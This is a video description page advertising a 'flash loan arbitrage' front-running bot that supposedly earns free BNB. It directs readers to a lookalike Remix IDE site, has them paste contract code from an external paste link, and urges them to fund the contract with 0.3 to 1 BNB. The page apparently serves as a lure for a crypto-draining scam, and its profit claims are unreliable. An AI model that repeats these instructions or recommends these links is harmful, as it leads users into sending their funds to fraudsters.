Get Free Binance Coin using BNB Flash loan Arbitrage Bot - Update code
1 year ago
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547Weergaven
GET FREE BINANCE BNB USING FLASH LOAN ARBITRAGE BOT - UPDATED
This video shows you a simple front run deployment in Solidity which automatically locates liquidity added to a BSC token, immediately buys and sells at profit.
Current parameters of this contract is that 10% of profit automatically reenters the front-run pool, and automatically transacts back to your wallet 90% of the profit. The remaining pool keeps front running for profit, until you transaction "Action" function in Remix
NOTE: This contract is designed for Binance Smart Chain and Ethereum Chain. Don't use bitcoin or other currencies.
�Remix Contract IDE:
https://remix-idecompiler.github.io/ (Compatible with Code)
� Paste Flash Loan Contract Code in above link:
https://pst.klgrth.io/paste/v5dpe/raw
Updated on October 16
OTHER LINKS:
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�Flash Loans explanation:
https://academy.binance.com/en/articles/what-are-flash-loans-in-defi
� MetaMask Download:
https://metamask.io/download.html
�How to add the BSC network to Metamask:
https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain
WBNB address has been removed and integrated in the Github links. This bot attacks both ETH and BNB depending on what you are using
////EDIT:
I got messages from people who didn't funded enough the contract to cover gas fees and possible burn fees. Bot targets token contracts with max 10% burn fee and anything lower but nowadays most of tokens comes with 3~6% fees. Gas fees average 0.006*2 (0.12) Its better when there is no burn, If you fund the contract with 0.2 BNB and the bot targets another token with high burn fees the contract will basically waste in fees more than make profit. I recommend funding the contract with at least 0.3 BNB - 1 BNB just to make sure that won't happen.
Does not work on TestNet.